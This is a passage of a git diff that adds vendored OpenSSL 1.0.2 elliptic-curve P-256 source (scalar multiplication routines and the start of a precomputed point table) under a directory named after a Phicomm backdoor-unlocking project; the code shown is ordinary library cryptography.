+    wvalue = *((u16 *) & p_str[0]);
+    wvalue = (wvalue << 1) & mask;
+    index += window_size;
+    booth_recode_w7(&sign0, &digit0, wvalue);
+    wvalue = *((u16 *) & p_str[(index - 1) / 8]);
+    wvalue = (wvalue >> ((index - 1) % 8)) & mask;
+    index += window_size;
+    booth_recode_w7(&sign1, &digit1, wvalue);
+    wvalue = *((u16 *) & p_str[(index - 1) / 8]);
+    wvalue = (wvalue >> ((index - 1) % 8)) & mask;
+    index += window_size;
+    booth_recode_w7(&sign2, &digit2, wvalue);
+    wvalue = *((u16 *) & p_str[(index - 1) / 8]);
+    wvalue = (wvalue >> ((index - 1) % 8)) & mask;
+    index += window_size;
+    booth_recode_w7(&sign3, &digit3, wvalue);
+
+    ecp_nistz256_avx2_multi_select_w7(point_arr, preComputedTable[0],
+                                      digit0, digit1, digit2, digit3);
+
+    ecp_nistz256_neg(tmp, point_arr[0].Y);
+    copy_conditional(point_arr[0].Y, tmp, sign0);
+    ecp_nistz256_neg(tmp, point_arr[1].Y);
+    copy_conditional(point_arr[1].Y, tmp, sign1);
+    ecp_nistz256_neg(tmp, point_arr[2].Y);
+    copy_conditional(point_arr[2].Y, tmp, sign2);
+    ecp_nistz256_neg(tmp, point_arr[3].Y);
+    copy_conditional(point_arr[3].Y, tmp, sign3);
+
+    ecp_nistz256_avx2_transpose_convert(aX4, point_arr);
+    ecp_nistz256_avx2_to_mont(aX4, aX4);
+    ecp_nistz256_avx2_to_mont(&aX4[4 * 9], &aX4[4 * 9]);
+    ecp_nistz256_avx2_set1(&aX4[4 * 9 * 2]);
+
+    wvalue = *((u16 *) & p_str[(index - 1) / 8]);
+    wvalue = (wvalue >> ((index - 1) % 8)) & mask;
+    index += window_size;
+    booth_recode_w7(&sign0, &digit0, wvalue);
+    wvalue = *((u16 *) & p_str[(index - 1) / 8]);
+    wvalue = (wvalue >> ((index - 1) % 8)) & mask;
+    index += window_size;
+    booth_recode_w7(&sign1, &digit1, wvalue);
+    wvalue = *((u16 *) & p_str[(index - 1) / 8]);
+    wvalue = (wvalue >> ((index - 1) % 8)) & mask;
+    index += window_size;
+    booth_recode_w7(&sign2, &digit2, wvalue);
+    wvalue = *((u16 *) & p_str[(index - 1) / 8]);
+    wvalue = (wvalue >> ((index - 1) % 8)) & mask;
+    index += window_size;
+    booth_recode_w7(&sign3, &digit3, wvalue);
+
+    ecp_nistz256_avx2_multi_select_w7(point_arr, preComputedTable[4 * 1],
+                                      digit0, digit1, digit2, digit3);
+
+    ecp_nistz256_neg(tmp, point_arr[0].Y);
+    copy_conditional(point_arr[0].Y, tmp, sign0);
+    ecp_nistz256_neg(tmp, point_arr[1].Y);
+    copy_conditional(point_arr[1].Y, tmp, sign1);
+    ecp_nistz256_neg(tmp, point_arr[2].Y);
+    copy_conditional(point_arr[2].Y, tmp, sign2);
+    ecp_nistz256_neg(tmp, point_arr[3].Y);
+    copy_conditional(point_arr[3].Y, tmp, sign3);
+
+    ecp_nistz256_avx2_transpose_convert(bX4, point_arr);
+    ecp_nistz256_avx2_to_mont(bX4, bX4);
+    ecp_nistz256_avx2_to_mont(&bX4[4 * 9], &bX4[4 * 9]);
+    /* Optimized when both inputs are affine */
+    ecp_nistz256_avx2_point_add_affines_x4(aX4, aX4, bX4);
+
+    for (i = 2; i < 9; i++) {
+        wvalue = *((u16 *) & p_str[(index - 1) / 8]);
+        wvalue = (wvalue >> ((index - 1) % 8)) & mask;
+        index += window_size;
+        booth_recode_w7(&sign0, &digit0, wvalue);
+        wvalue = *((u16 *) & p_str[(index - 1) / 8]);
+        wvalue = (wvalue >> ((index - 1) % 8)) & mask;
+        index += window_size;
+        booth_recode_w7(&sign1, &digit1, wvalue);
+        wvalue = *((u16 *) & p_str[(index - 1) / 8]);
+        wvalue = (wvalue >> ((index - 1) % 8)) & mask;
+        index += window_size;
+        booth_recode_w7(&sign2, &digit2, wvalue);
+        wvalue = *((u16 *) & p_str[(index - 1) / 8]);
+        wvalue = (wvalue >> ((index - 1) % 8)) & mask;
+        index += window_size;
+        booth_recode_w7(&sign3, &digit3, wvalue);
+
+        ecp_nistz256_avx2_multi_select_w7(point_arr,
+                                          preComputedTable[4 * i],
+                                          digit0, digit1, digit2, digit3);
+
+        ecp_nistz256_neg(tmp, point_arr[0].Y);
+        copy_conditional(point_arr[0].Y, tmp, sign0);
+        ecp_nistz256_neg(tmp, point_arr[1].Y);
+        copy_conditional(point_arr[1].Y, tmp, sign1);
+        ecp_nistz256_neg(tmp, point_arr[2].Y);
+        copy_conditional(point_arr[2].Y, tmp, sign2);
+        ecp_nistz256_neg(tmp, point_arr[3].Y);
+        copy_conditional(point_arr[3].Y, tmp, sign3);
+
+        ecp_nistz256_avx2_transpose_convert(bX4, point_arr);
+        ecp_nistz256_avx2_to_mont(bX4, bX4);
+        ecp_nistz256_avx2_to_mont(&bX4[4 * 9], &bX4[4 * 9]);
+
+        ecp_nistz256_avx2_point_add_affine_x4(aX4, aX4, bX4);
+    }
+
+    ecp_nistz256_avx2_from_mont(&aX4[4 * 9 * 0], &aX4[4 * 9 * 0]);
+    ecp_nistz256_avx2_from_mont(&aX4[4 * 9 * 1], &aX4[4 * 9 * 1]);
+    ecp_nistz256_avx2_from_mont(&aX4[4 * 9 * 2], &aX4[4 * 9 * 2]);
+
+    ecp_nistz256_avx2_convert_transpose_back(res_point_arr, aX4);
+    /* Last window is performed serially */
+    wvalue = *((u16 *) & p_str[(index - 1) / 8]);
+    wvalue = (wvalue >> ((index - 1) % 8)) & mask;
+    booth_recode_w7(&sign0, &digit0, wvalue);
+    ecp_nistz256_avx2_select_w7((P256_POINT_AFFINE *) r,
+                                preComputedTable[36], digit0);
+    ecp_nistz256_neg(tmp, r->Y);
+    copy_conditional(r->Y, tmp, sign0);
+    memcpy(r->Z, ONE, sizeof(ONE));
+    /* Sum the four windows */
+    ecp_nistz256_point_add(r, r, &res_point_arr[0]);
+    ecp_nistz256_point_add(r, r, &res_point_arr[1]);
+    ecp_nistz256_point_add(r, r, &res_point_arr[2]);
+    ecp_nistz256_point_add(r, r, &res_point_arr[3]);
+}
+# endif
+#endif
+
+static int ecp_nistz256_set_from_affine(EC_POINT *out, const EC_GROUP *group,
+                                        const P256_POINT_AFFINE *in,
+                                        BN_CTX *ctx)
+{
+    BIGNUM x, y;
+    BN_ULONG d_x[P256_LIMBS], d_y[P256_LIMBS];
+    int ret = 0;
+
+    memcpy(d_x, in->X, sizeof(d_x));
+    x.d = d_x;
+    x.dmax = x.top = P256_LIMBS;
+    x.neg = 0;
+    x.flags = BN_FLG_STATIC_DATA;
+
+    memcpy(d_y, in->Y, sizeof(d_y));
+    y.d = d_y;
+    y.dmax = y.top = P256_LIMBS;
+    y.neg = 0;
+    y.flags = BN_FLG_STATIC_DATA;
+
+    ret = EC_POINT_set_affine_coordinates_GFp(group, out, &x, &y, ctx);
+
+    return ret;
+}
+
+/* r = scalar*G + sum(scalars[i]*points[i]) */
+static int ecp_nistz256_points_mul(const EC_GROUP *group,
+                                   EC_POINT *r,
+                                   const BIGNUM *scalar,
+                                   size_t num,
+                                   const EC_POINT *points[],
+                                   const BIGNUM *scalars[], BN_CTX *ctx)
+{
+    int i = 0, ret = 0, no_precomp_for_generator = 0, p_is_infinity = 0;
+    size_t j;
+    unsigned char p_str[33] = { 0 };
+    const PRECOMP256_ROW *preComputedTable = NULL;
+    const EC_PRE_COMP *pre_comp = NULL;
+    const EC_POINT *generator = NULL;
+    unsigned int index = 0;
+    const unsigned int window_size = 7;
+    const unsigned int mask = (1 << (window_size + 1)) - 1;
+    unsigned int wvalue;
+    ALIGN32 union {
+        P256_POINT p;
+        P256_POINT_AFFINE a;
+    } t, p;
+    BIGNUM *tmp_scalar;
+
+    if (group->meth != r->meth) {
+        ECerr(EC_F_ECP_NISTZ256_POINTS_MUL, EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    if ((scalar == NULL) && (num == 0))
+        return EC_POINT_set_to_infinity(group, r);
+
+    for (j = 0; j < num; j++) {
+        if (group->meth != points[j]->meth) {
+            ECerr(EC_F_ECP_NISTZ256_POINTS_MUL, EC_R_INCOMPATIBLE_OBJECTS);
+            return 0;
+        }
+    }
+
+    /* Need 256 bits for space for all coordinates. */
+    bn_wexpand(&r->X, P256_LIMBS);
+    bn_wexpand(&r->Y, P256_LIMBS);
+    bn_wexpand(&r->Z, P256_LIMBS);
+    r->X.top = P256_LIMBS;
+    r->Y.top = P256_LIMBS;
+    r->Z.top = P256_LIMBS;
+
+    if (scalar) {
+        generator = EC_GROUP_get0_generator(group);
+        if (generator == NULL) {
+            ECerr(EC_F_ECP_NISTZ256_POINTS_MUL, EC_R_UNDEFINED_GENERATOR);
+            goto err;
+        }
+
+        /* look if we can use precomputed multiples of generator */
+        pre_comp =
+            EC_EX_DATA_get_data(group->extra_data, ecp_nistz256_pre_comp_dup,
+                                ecp_nistz256_pre_comp_free,
+                                ecp_nistz256_pre_comp_clear_free);
+
+        if (pre_comp) {
+            /*
+             * If there is a precomputed table for the generator, check that
+             * it was generated with the same generator.
+             */
+            EC_POINT *pre_comp_generator = EC_POINT_new(group);
+            if (pre_comp_generator == NULL)
+                goto err;
+
+            if (!ecp_nistz256_set_from_affine
+                (pre_comp_generator, group, pre_comp->precomp[0], ctx))
+                goto err;
+
+            if (0 == EC_POINT_cmp(group, generator, pre_comp_generator, ctx))
+                preComputedTable = (const PRECOMP256_ROW *)pre_comp->precomp;
+
+            EC_POINT_free(pre_comp_generator);
+        }
+
+        if (preComputedTable == NULL && ecp_nistz256_is_affine_G(generator)) {
+            /*
+             * If there is no precomputed data, but the generator
+             * is the default, a hardcoded table of precomputed
+             * data is used. This is because applications, such as
+             * Apache, do not use EC_KEY_precompute_mult.
+             */
+            preComputedTable = (const PRECOMP256_ROW *)ecp_nistz256_precomputed;
+        }
+
+        if (preComputedTable) {
+            if ((BN_num_bits(scalar) > 256)
+                || BN_is_negative(scalar)) {
+                if ((tmp_scalar = BN_CTX_get(ctx)) == NULL)
+                    goto err;
+
+                if (!BN_nnmod(tmp_scalar, scalar, &group->order, ctx)) {
+                    ECerr(EC_F_ECP_NISTZ256_POINTS_MUL, ERR_R_BN_LIB);
+                    goto err;
+                }
+                scalar = tmp_scalar;
+            }
+
+            for (i = 0; i < scalar->top * BN_BYTES; i += BN_BYTES) {
+                BN_ULONG d = scalar->d[i / BN_BYTES];
+
+                p_str[i + 0] = d & 0xff;
+                p_str[i + 1] = (d >> 8) & 0xff;
+                p_str[i + 2] = (d >> 16) & 0xff;
+                p_str[i + 3] = (d >>= 24) & 0xff;
+                if (BN_BYTES == 8) {
+                    d >>= 8;
+                    p_str[i + 4] = d & 0xff;
+                    p_str[i + 5] = (d >> 8) & 0xff;
+                    p_str[i + 6] = (d >> 16) & 0xff;
+                    p_str[i + 7] = (d >> 24) & 0xff;
+                }
+            }
+
+            for (; i < 33; i++)
+                p_str[i] = 0;
+
+#if defined(ECP_NISTZ256_AVX2)
+            if (ecp_nistz_avx2_eligible()) {
+                ecp_nistz256_avx2_mul_g(&p.p, p_str, preComputedTable);
+            } else
+#endif
+            {
+                /* First window */
+                wvalue = (p_str[0] << 1) & mask;
+                index += window_size;
+
+                wvalue = _booth_recode_w7(wvalue);
+
+                ecp_nistz256_select_w7(&p.a, preComputedTable[0], wvalue >> 1);
+
+                ecp_nistz256_neg(p.p.Z, p.p.Y);
+                copy_conditional(p.p.Y, p.p.Z, wvalue & 1);
+
+                memcpy(p.p.Z, ONE, sizeof(ONE));
+
+                for (i = 1; i < 37; i++) {
+                    unsigned int off = (index - 1) / 8;
+                    wvalue = p_str[off] | p_str[off + 1] << 8;
+                    wvalue = (wvalue >> ((index - 1) % 8)) & mask;
+                    index += window_size;
+
+                    wvalue = _booth_recode_w7(wvalue);
+
+                    ecp_nistz256_select_w7(&t.a,
+                                           preComputedTable[i], wvalue >> 1);
+
+                    ecp_nistz256_neg(t.p.Z, t.a.Y);
+                    copy_conditional(t.a.Y, t.p.Z, wvalue & 1);
+
+                    ecp_nistz256_point_add_affine(&p.p, &p.p, &t.a);
+                }
+            }
+        } else {
+            p_is_infinity = 1;
+            no_precomp_for_generator = 1;
+        }
+    } else
+        p_is_infinity = 1;
+
+    if (no_precomp_for_generator) {
+        /*
+         * Without a precomputed table for the generator, it has to be
+         * handled like a normal point.
+         */
+        const BIGNUM **new_scalars;
+        const EC_POINT **new_points;
+
+        new_scalars = OPENSSL_malloc((num + 1) * sizeof(BIGNUM *));
+        if (!new_scalars) {
+            ECerr(EC_F_ECP_NISTZ256_POINTS_MUL, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+
+        new_points = OPENSSL_malloc((num + 1) * sizeof(EC_POINT *));
+        if (!new_points) {
+            OPENSSL_free(new_scalars);
+            ECerr(EC_F_ECP_NISTZ256_POINTS_MUL, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+
+        memcpy(new_scalars, scalars, num * sizeof(BIGNUM *));
+        new_scalars[num] = scalar;
+        memcpy(new_points, points, num * sizeof(EC_POINT *));
+        new_points[num] = generator;
+
+        scalars = new_scalars;
+        points = new_points;
+        num++;
+    }
+
+    if (num) {
+        P256_POINT *out = &t.p;
+        if (p_is_infinity)
+            out = &p.p;
+
+        ecp_nistz256_windowed_mul(group, out, scalars, points, num, ctx);
+
+        if (!p_is_infinity)
+            ecp_nistz256_point_add(&p.p, &p.p, out);
+    }
+
+    if (no_precomp_for_generator) {
+        OPENSSL_free(points);
+        OPENSSL_free(scalars);
+    }
+
+    memcpy(r->X.d, p.p.X, sizeof(p.p.X));
+    memcpy(r->Y.d, p.p.Y, sizeof(p.p.Y));
+    memcpy(r->Z.d, p.p.Z, sizeof(p.p.Z));
+    bn_correct_top(&r->X);
+    bn_correct_top(&r->Y);
+    bn_correct_top(&r->Z);
+
+    ret = 1;
+
+ err:
+    return ret;
+}
+
+static int ecp_nistz256_get_affine(const EC_GROUP *group,
+                                   const EC_POINT *point,
+                                   BIGNUM *x, BIGNUM *y, BN_CTX *ctx)
+{
+    BN_ULONG z_inv2[P256_LIMBS];
+    BN_ULONG z_inv3[P256_LIMBS];
+    BN_ULONG x_aff[P256_LIMBS];
+    BN_ULONG y_aff[P256_LIMBS];
+    BN_ULONG point_x[P256_LIMBS], point_y[P256_LIMBS], point_z[P256_LIMBS];
+
+    if (EC_POINT_is_at_infinity(group, point)) {
+        ECerr(EC_F_ECP_NISTZ256_GET_AFFINE, EC_R_POINT_AT_INFINITY);
+        return 0;
+    }
+
+    if (!ecp_nistz256_bignum_to_field_elem(point_x, &point->X) ||
+        !ecp_nistz256_bignum_to_field_elem(point_y, &point->Y) ||
+        !ecp_nistz256_bignum_to_field_elem(point_z, &point->Z)) {
+        ECerr(EC_F_ECP_NISTZ256_GET_AFFINE, EC_R_COORDINATES_OUT_OF_RANGE);
+        return 0;
+    }
+
+    ecp_nistz256_mod_inverse(z_inv3, point_z);
+    ecp_nistz256_sqr_mont(z_inv2, z_inv3);
+    ecp_nistz256_mul_mont(x_aff, z_inv2, point_x);
+
+    if (x != NULL) {
+        bn_wexpand(x, P256_LIMBS);
+        x->top = P256_LIMBS;
+        ecp_nistz256_from_mont(x->d, x_aff);
+        bn_correct_top(x);
+    }
+
+    if (y != NULL) {
+        ecp_nistz256_mul_mont(z_inv3, z_inv3, z_inv2);
+        ecp_nistz256_mul_mont(y_aff, z_inv3, point_y);
+        bn_wexpand(y, P256_LIMBS);
+        y->top = P256_LIMBS;
+        ecp_nistz256_from_mont(y->d, y_aff);
+        bn_correct_top(y);
+    }
+
+    return 1;
+}
+
+static EC_PRE_COMP *ecp_nistz256_pre_comp_new(const EC_GROUP *group)
+{
+    EC_PRE_COMP *ret = NULL;
+
+    if (!group)
+        return NULL;
+
+    ret = (EC_PRE_COMP *)OPENSSL_malloc(sizeof(EC_PRE_COMP));
+
+    if (!ret) {
+        ECerr(EC_F_ECP_NISTZ256_PRE_COMP_NEW, ERR_R_MALLOC_FAILURE);
+        return ret;
+    }
+
+    ret->group = group;
+    ret->w = 6;                 /* default */
+    ret->precomp = NULL;
+    ret->precomp_storage = NULL;
+    ret->references = 1;
+    return ret;
+}
+
+static void *ecp_nistz256_pre_comp_dup(void *src_)
+{
+    EC_PRE_COMP *src = src_;
+
+    /* no need to actually copy, these objects never change! */
+    CRYPTO_add(&src->references, 1, CRYPTO_LOCK_EC_PRE_COMP);
+
+    return src_;
+}
+
+static void ecp_nistz256_pre_comp_free(void *pre_)
+{
+    int i;
+    EC_PRE_COMP *pre = pre_;
+
+    if (!pre)
+        return;
+
+    i = CRYPTO_add(&pre->references, -1, CRYPTO_LOCK_EC_PRE_COMP);
+    if (i > 0)
+        return;
+
+    if (pre->precomp_storage)
+        OPENSSL_free(pre->precomp_storage);
+
+    OPENSSL_free(pre);
+}
+
+static void ecp_nistz256_pre_comp_clear_free(void *pre_)
+{
+    int i;
+    EC_PRE_COMP *pre = pre_;
+
+    if (!pre)
+        return;
+
+    i = CRYPTO_add(&pre->references, -1, CRYPTO_LOCK_EC_PRE_COMP);
+    if (i > 0)
+        return;
+
+    if (pre->precomp_storage) {
+        OPENSSL_cleanse(pre->precomp,
+                        32 * sizeof(unsigned char) * (1 << pre->w) * 2 * 37);
+        OPENSSL_free(pre->precomp_storage);
+    }
+    OPENSSL_cleanse(pre, sizeof *pre);
+    OPENSSL_free(pre);
+}
+
+static int ecp_nistz256_window_have_precompute_mult(const EC_GROUP *group)
+{
+    /* There is a hard-coded table for the default generator. */
+    const EC_POINT *generator = EC_GROUP_get0_generator(group);
+    if (generator != NULL && ecp_nistz256_is_affine_G(generator)) {
+        /* There is a hard-coded table for the default generator. */
+        return 1;
+    }
+
+    return EC_EX_DATA_get_data(group->extra_data, ecp_nistz256_pre_comp_dup,
+                               ecp_nistz256_pre_comp_free,
+                               ecp_nistz256_pre_comp_clear_free) != NULL;
+}
+
+const EC_METHOD *EC_GFp_nistz256_method(void)
+{
+    static const EC_METHOD ret = {
+        EC_FLAGS_DEFAULT_OCT,
+        NID_X9_62_prime_field,
+        ec_GFp_mont_group_init,
+        ec_GFp_mont_group_finish,
+        ec_GFp_mont_group_clear_finish,
+        ec_GFp_mont_group_copy,
+        ec_GFp_mont_group_set_curve,
+        ec_GFp_simple_group_get_curve,
+        ec_GFp_simple_group_get_degree,
+        ec_GFp_simple_group_check_discriminant,
+        ec_GFp_simple_point_init,
+        ec_GFp_simple_point_finish,
+        ec_GFp_simple_point_clear_finish,
+        ec_GFp_simple_point_copy,
+        ec_GFp_simple_point_set_to_infinity,
+        ec_GFp_simple_set_Jprojective_coordinates_GFp,
+        ec_GFp_simple_get_Jprojective_coordinates_GFp,
+        ec_GFp_simple_point_set_affine_coordinates,
+        ecp_nistz256_get_affine,
+        0, 0, 0,
+        ec_GFp_simple_add,
+        ec_GFp_simple_dbl,
+        ec_GFp_simple_invert,
+        ec_GFp_simple_is_at_infinity,
+        ec_GFp_simple_is_on_curve,
+        ec_GFp_simple_cmp,
+        ec_GFp_simple_make_affine,
+        ec_GFp_simple_points_make_affine,
+        ecp_nistz256_points_mul,                    /* mul */
+        ecp_nistz256_mult_precompute,               /* precompute_mult */
+        ecp_nistz256_window_have_precompute_mult,   /* have_precompute_mult */
+        ec_GFp_mont_field_mul,
+        ec_GFp_mont_field_sqr,
+        0,                                          /* field_div */
+        ec_GFp_mont_field_encode,
+        ec_GFp_mont_field_decode,
+        ec_GFp_mont_field_set_to_one
+    };
+
+    return &ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistz256_table.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistz256_table.c
new file mode 100644
index 0000000..216d024
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistz256_table.c
@@ -0,0 +1,9533 @@
+/*
+ * This is the precomputed constant time access table for the code in
+ * ecp_montp256.c, for the default generator. The table consists of 37
+ * subtables, each subtable contains 64 affine points. The affine points are
+ * encoded as eight uint64's, four for the x coordinate and four for the y.
+ * Both values are in little-endian order. There are 37 tables because a
+ * signed, 6-bit wNAF form of the scalar is used and ceil(256/(6 + 1)) = 37.
+ * Within each table there are 64 values because the 6-bit wNAF value can
+ * take 64 values, ignoring the sign bit, which is implemented by performing
+ * a negation of the affine point when required. We would like to align it
+ * to 2MB in order to increase the chances of using a large page but that
+ * appears to lead to invalid ELF files being produced.
+ */
+
+#if defined(__GNUC__)
+__attribute((aligned(4096)))
+#elif defined(_MSC_VER)
+__declspec(align(4096))
+#elif defined(__SUNPRO_C)
+# pragma align 4096(ecp_nistz256_precomputed)
+#endif
+static const BN_ULONG ecp_nistz256_precomputed[37][64 *
+                                                   sizeof(P256_POINT_AFFINE) /
+                                                   sizeof(BN_ULONG)] = {
+    {TOBN(0x79e730d4, 0x18a9143c), TOBN(0x75ba95fc, 0x5fedb601),
+     TOBN(0x79fb732b, 0x77622510), TOBN(0x18905f76, 0xa53755c6),
+     TOBN(0xddf25357, 0xce95560a), TOBN(0x8b4ab8e4, 0xba19e45c),
+     TOBN(0xd2e88688, 0xdd21f325), TOBN(0x8571ff18, 0x25885d85),
+     TOBN(0x850046d4, 0x10ddd64d), TOBN(0xaa6ae3c1, 0xa433827d),
+     TOBN(0x73220503, 0x8d1490d9), TOBN(0xf6bb32e4, 0x3dcf3a3b),
+     TOBN(0x2f3648d3, 0x61bee1a5), TOBN(0x152cd7cb, 0xeb236ff8),
+     TOBN(0x19a8fb0e, 0x92042dbe), TOBN(0x78c57751, 0x0a5b8a3b),
+     TOBN(0xffac3f90, 0x4eebc127), TOBN(0xb027f84a, 0x087d81fb),
+     TOBN(0x66ad77dd, 0x87cbbc98), TOBN(0x26936a3f, 0xb6ff747e),
+     TOBN(0xb04c5c1f, 0xc983a7eb), TOBN(0x583e47ad, 0x0861fe1a),
+     TOBN(0x78820831, 0x1a2ee98e), TOBN(0xd5f06a29, 0xe587cc07),
+     TOBN(0x74b0b50d, 0x46918dcc), TOBN(0x4650a6ed, 0xc623c173),
+     TOBN(0x0cdaacac, 0xe8100af2), TOBN(0x577362f5, 0x41b0176b),
+     TOBN(0x2d96f24c, 0xe4cbaba6), TOBN(0x17628471, 0xfad6f447),
+     TOBN(0x6b6c36de, 0xe5ddd22e), TOBN(0x84b14c39, 0x4c5ab863),
+     TOBN(0xbe1b8aae, 0xc45c61f5), TOBN(0x90ec649a, 0x94b9537d),
+     TOBN(0x941cb5aa, 0xd076c20c), TOBN(0xc9079605, 0x890523c8),
+     TOBN(0xeb309b4a, 0xe7ba4f10), TOBN(0x73c568ef, 0xe5eb882b),
+     TOBN(0x3540a987, 0x7e7a1f68), TOBN(0x73a076bb, 0x2dd1e916),
+     TOBN(0x40394737, 0x3e77664a), TOBN(0x55ae744f, 0x346cee3e),
+     TOBN(0xd50a961a, 0x5b17a3ad), TOBN(0x13074b59, 0x54213673),
+     TOBN(0x93d36220, 0xd377e44b), TOBN(0x299c2b53, 0xadff14b5),
+     TOBN(0xf424d44c, 0xef639f11), TOBN(0xa4c9916d, 0x4a07f75f),
+     TOBN(0x0746354e, 0xa0173b4f), TOBN(0x2bd20213, 0xd23c00f7),
+     TOBN(0xf43eaab5, 0x0c23bb08), TOBN(0x13ba5119, 0xc3123e03),
+     TOBN(0x2847d030, 0x3f5b9d4d), TOBN(0x6742f2f2, 0x5da67bdd),
+     TOBN(0xef933bdc, 0x77c94195), TOBN(0xeaedd915, 0x6e240867),
+     TOBN(0x27f14cd1, 0x9499a78f), TOBN(0x462ab5c5, 0x6f9b3455),
+     TOBN(0x8f90f02a, 0xf02cfc6b), TOBN(0xb763891e, 0xb265230d),
+     TOBN(0xf59da3a9, 0x532d4977), TOBN(0x21e3327d, 0xcf9eba15),
+     TOBN(0x123c7b84, 0xbe60bbf0), TOBN(0x56ec12f2, 0x7706df76),
+     TOBN(0x75c96e8f, 0x264e20e8), TOBN(0xabe6bfed, 0x59a7a841),
+     TOBN(0x2cc09c04, 0x44c8eb00), TOBN(0xe05b3080, 0xf0c4e16b),
+     TOBN(0x1eb7777a, 0xa45f3314), TOBN(0x56af7bed, 0xce5d45e3),
+     TOBN(0x2b6e019a, 0x88b12f1a), TOBN(0x086659cd, 0xfd835f9b),
+     TOBN(0x2c18dbd1, 0x9dc21ec8), TOBN(0x98f9868a, 0x0fcf8139),
+     TOBN(0x737d2cd6, 0x48250b49), TOBN(0xcc61c947, 0x24b3428f),
+     TOBN(0x0c2b4078, 0x80dd9e76), TOBN(0xc43a8991, 0x383fbe08),
+     TOBN(0x5f7d2d65, 0x779be5d2), TOBN(0x78719a54, 0xeb3b4ab5),
+     TOBN(0xea7d260a, 0x6245e404), TOBN(0x9de40795, 0x6e7fdfe0),
+     TOBN(0x1ff3a415, 0x8dac1ab5), TOBN(0x3e7090f1, 0x649c9073),
+     TOBN(0x1a768561, 0x2b944e88), TOBN(0x250f939e, 0xe57f61c8),
+     TOBN(0x0c0daa89, 0x1ead643d), TOBN(0x68930023, 0xe125b88e),
+     TOBN(0x04b71aa7, 0xd2697768), TOBN(0xabdedef5, 0xca345a33),
+     TOBN(0x2409d29d, 0xee37385e), TOBN(0x4ee1df77, 0xcb83e156),
+     TOBN(0x0cac12d9, 0x1cbb5b43), TOBN(0x170ed2f6, 0xca895637),
+     TOBN(0x28228cfa, 0x8ade6d66), TOBN(0x7ff57c95, 0x53238aca),
+     TOBN(0xccc42563, 0x4b2ed709), TOBN(0x0e356769, 0x856fd30d),
+     TOBN(0xbcbcd43f, 0x559e9811), TOBN(0x738477ac, 0x5395b759),
+     TOBN(0x35752b90, 0xc00ee17f), TOBN(0x68748390, 0x742ed2e3),
+     TOBN(0x7cd06422, 0xbd1f5bc1), TOBN(0xfbc08769, 0xc9e7b797),
+     TOBN(0xa242a35b, 0xb0cf664a), TOBN(0x126e48f7, 0x7f9707e3),
+     TOBN(0x1717bf54, 0xc6832660), TOBN(0xfaae7332, 0xfd12c72e),
+     TOBN(0x27b52db7, 0x995d586b), TOBN(0xbe29569e, 0x832237c2),
+     TOBN(0xe8e4193e, 0x2a65e7db), TOBN(0x152706dc, 0x2eaa1bbb),
+     TOBN(0x72bcd8b7, 0xbc60055b), TOBN(0x03cc23ee, 0x56e27e4b),
+     TOBN(0xee337424, 0xe4819370), TOBN(0xe2aa0e43, 0x0ad3da09),
+     TOBN(0x40b8524f, 0x6383c45d), TOBN(0xd7663554, 0x42a41b25),
+     TOBN(0x64efa6de, 0x778a4797), TOBN(0x2042170a, 0x7079adf4),
+     TOBN(0x808b0b65, 0x0bc6fb80), TOBN(0x5882e075, 0x3ffe2e6b),
+     TOBN(0xd5ef2f7c, 0x2c83f549), TOBN(0x54d63c80, 0x9103b723),
+     TOBN(0xf2f11bd6, 0x52a23f9b), TOBN(0x3670c319, 0x4b0b6587),
+     TOBN(0x55c4623b, 0xb1580e9e), TOBN(0x64edf7b2, 0x01efe220),
+     TOBN(0x97091dcb, 0xd53c5c9d), TOBN(0xf17624b6, 0xac0a177b),
+     TOBN(0xb0f13975, 0x2cfe2dff), TOBN(0xc1a35c0a, 0x6c7a574e),
+     TOBN(0x227d3146, 0x93e79987), TOBN(0x0575bf30, 0xe89cb80e),
+     TOBN(0x2f4e247f, 0x0d1883bb), TOBN(0xebd51226, 0x3274c3d0),
+     TOBN(0x5f3e51c8, 0x56ada97a), TOBN(0x4afc964d, 0x8f8b403e),
+     TOBN(0xa6f247ab, 0x412e2979), TOBN(0x675abd1b, 0x6f80ebda),
+     TOBN(0x66a2bd72, 0x5e485a1d), TOBN(0x4b2a5caf, 0x8f4f0b3c),
+     TOBN(0x2626927f, 0x1b847bba), TOBN(0x6c6fc7d9, 0x0502394d),
+     TOBN(0xfea912ba, 0xa5659ae8), TOBN(0x68363aba, 0x25e1a16e),
+     TOBN(0xb8842277, 0x752c41ac), TOBN(0xfe545c28, 0x2897c3fc),
+     TOBN(0x2d36e9e7, 0xdc4c696b), TOBN(0x5806244a, 0xfba977c5),
+     TOBN(0x85665e9b, 0xe39508c1), TOBN(0xf720ee25, 0x6d12597b),
+     TOBN(0x8a979129, 0xd2337a31), TOBN(0x5916868f, 0x0f862bdc),
+     TOBN(0x048099d9, 0x5dd283ba), TOBN(0xe2d1eeb6, 0xfe5bfb4e),
+     TOBN(0x82ef1c41, 0x7884005d), TOBN(0xa2d4ec17, 0xffffcbae),
+     TOBN(0x9161c53f, 0x8aa95e66), TOBN(0x5ee104e1, 0xc5fee0d0),
+     TOBN(0x562e4cec, 0xc135b208), TOBN(0x74e1b265, 0x4783f47d),
+     TOBN(0x6d2a506c, 0x5a3f3b30), TOBN(0xecead9f4, 0xc16762fc),
+     TOBN(0xf29dd4b2, 0xe286e5b9), TOBN(0x1b0fadc0, 0x83bb3c61),
+     TOBN(0x7a75023e, 0x7fac29a4), TOBN(0xc086d5f1, 0xc9477fa3),
+     TOBN(0x0fc61135, 0x2f6f3076), TOBN(0xc99ffa23, 0xe3912a9a),
+     TOBN(0x6a0b0685, 0xd2f8ba3d), TOBN(0xfdc777e8, 0xe93358a4),
+     TOBN(0x94a787bb, 0x35415f04), TOBN(0x640c2d6a, 0x4d23fea4),
+     TOBN(0x9de917da, 0x153a35b5), TOBN(0x793e8d07, 0x5d5cd074),
+     TOBN(0xf4f87653, 0x2de45068), TOBN(0x37c7a7e8, 0x9e2e1f6e),
+     TOBN(0xd0825fa2, 0xa3584069), TOBN(0xaf2cea7c, 0x1727bf42),
+     TOBN(0x0360a4fb, 0x9e4785a9), TOBN(0xe5fda49c, 0x27299f4a),
